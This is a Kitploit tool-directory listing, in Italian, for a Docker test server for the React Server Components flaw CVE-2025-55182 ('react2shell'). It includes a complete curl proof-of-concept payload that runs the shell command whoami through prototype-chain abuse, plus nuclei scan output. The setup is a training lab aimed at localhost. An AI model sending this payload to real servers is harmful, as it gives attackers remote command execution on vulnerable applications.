Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Test-Server — Gioca con react2shell in un ambiente sicuro! | Kitploit
Strumenti/GitHubGitHub/doobthegoober/cve-2025-55182-test-server
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubdoobthegoober/cve-2025-55182-test-server

CVE-2025-55182-Test-Server

Gioca con react2shell in un ambiente sicuro!

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-55182-Test-Server

Gioca con react2shell in un ambiente sicuro!

Avvio rapido

Clona il repository

root@kitploit:~
git clone https://github.com/CharlesTheGreat77/CVE-2025-55182-Test-Server
cd CVE-2025-55182-Test-Server

Esegui il file Docker

root@kitploit:~
docker compose up --build -d

PoC

root@kitploit:~
curl -s -X POST http://localhost:3000/adfa \
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.5" \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----NextRceMitsecOps" \
  --data-binary $'------NextRceMitsecOps\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'whoami\').toString(\'base64\');throw Object.assign(new Error(\'x\'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------NextRceMitsecOps--\r\n' | grep -o '"digest"[[:space:]]*:[[:space:]]*"[^"]*"' | sed 's/.*"digest":[[:space:]]*"//' | sed 's/"$//' | base64 -d && echo

Nuclei

Ho aggiunto un template di nuclei per verificare in sicurezza la CVE-2025-55182

root@kitploit:~
nuclei -u http://localhost:3000 -t react-rsc-rce.yaml

[INF] Current nuclei version: v3.6.0 (latest)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://localhost:3000/
[INF] Scan completed in 42.390709ms. 1 matches found.

Da fare

  • Estensione Burpsuite per scansionare passivamente la vulnerabilità aggiungendo comandi personalizzati da eseguire.
Scarica lo strumento